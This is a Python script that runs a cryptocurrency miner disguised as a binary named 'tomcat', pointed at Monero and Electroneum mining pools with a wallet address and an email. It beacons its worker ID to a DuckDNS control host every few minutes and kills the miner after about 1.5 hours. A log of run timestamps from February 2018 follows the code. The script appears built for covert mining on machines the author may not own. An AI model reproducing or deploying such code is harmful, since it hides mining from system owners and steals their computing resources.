import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:29:03.660026
#2018-02-17 16:15:08.440035
#2018-02-17 18:04:07.768681
#2018-02-17 19:51:05.386828
#2018-02-17 21:38:07.553539
#2018-02-17 23:22:05.059003
#2018-02-18 01:09:05.327045
#2018-02-18 02:56:07.868446
#2018-02-18 04:44:03.844876
#2018-02-18 06:36:04.158828
#2018-02-18 08:24:01.289727
#2018-02-18 10:12:03.502848
#2018-02-18 11:57:06.799103
#2018-02-18 13:42:06.118525
#2018-02-18 15:33:03.798567
#2018-02-18 17:21:05.534667
#2018-02-18 19:10:03.878576
#2018-02-18 20:56:06.337017
#2018-02-18 22:41:05.375737
#2018-02-19 00:30:09.237907
#2018-02-19 02:15:06.269828
#2018-02-19 04:03:01.338892
#2018-02-19 05:46:04.175638
#2018-02-19 07:36:07.184547
#2018-02-19 09:25:06.220725
#2018-02-19 11:14:05.808749
#2018-02-19 13:02:04.412510
#2018-02-19 14:51:05.060164
#2018-02-19 16:38:07.471859
#2018-02-19 18:25:09.883083
#2018-02-19 20:10:08.758979
#2018-02-19 22:00:06.741632
#2018-02-19 23:47:05.292488
#2018-02-20 01:34:05.472166
#2018-02-20 03:22:05.748600
#2018-02-20 05:08:05.402371
#2018-02-20 06:50:08.080203
#2018-02-20 08:36:01.694398
#2018-02-20 10:19:07.035026
#2018-02-20 12:04:09.341783
#2018-02-20 13:52:04.338978
#2018-02-20 15:37:10.354023
#2018-02-20 17:22:08.573557
#2018-02-20 19:11:07.363752
#2018-02-20 21:01:09.175743
#2018-02-20 22:47:06.755745
#2018-02-21 00:28:07.988345
#2018-02-21 02:14:04.722925
#2018-02-21 04:02:04.885516
#2018-02-21 05:49:04.931131
#2018-02-21 07:38:06.314368
#2018-02-21 09:22:07.960285
#2018-02-21 11:10:11.783899
#2018-02-21 12:58:06.977145
#2018-02-21 14:46:14.320421
#2018-02-21 16:34:11.597482
#2018-02-21 18:25:08.281765
#2018-02-21 20:10:08.708091
#2018-02-21 21:57:01.755689
#2018-02-21 23:44:08.113670
#2018-02-22 01:34:07.307704
#2018-02-22 03:21:07.837154
#2018-02-22 05:07:07.514962
#2018-02-22 06:52:07.580182
#2018-02-22 08:41:07.302547
#2018-02-22 10:28:04.857604
#2018-02-22 12:14:01.505374
#2018-02-22 13:59:01.762468
#2018-02-22 15:46:08.401986
#2018-02-22 17:34:05.420785
#2018-02-22 19:21:08.469636
#2018-02-22 21:13:09.197225
#2018-02-22 22:58:06.086606
#2018-02-23 00:46:05.642002
#2018-02-23 02:33:01.856097
#2018-02-23 04:21:07.465170
#2018-02-23 06:08:03.917766
#2018-02-23 07:55:08.497833
#2018-02-23 10:11:07.682483
#2018-02-23 12:05:08.694738
#2018-02-23 13:52:04.628235
#2018-02-23 15:42:01.249455
#2018-02-23 17:28:01.792434
#2018-02-23 19:13:01.375507
#2018-02-23 20:59:08.042259
#2018-02-23 22:46:08.812296
#2018-02-24 00:34:05.378115
#2018-02-24 02:24:07.235357
#2018-02-24 04:13:04.897718
#2018-02-24 06:01:07.564508
#2018-02-24 07:50:04.591263
#2018-02-24 09:36:06.797991
#2018-02-24 11:31:07.574294
#2018-02-24 13:20:09.899644
#2018-02-24 15:10:02.804989
#2018-02-24 16:59:03.704027
#2018-02-24 18:48:05.363654
#2018-02-24 20:39:05.451459
#2018-02-24 22:46:06.447096
#2018-02-25 02:08:01.403779
#2018-02-25 05:58:01.688979
#2018-02-25 11:38:04.891449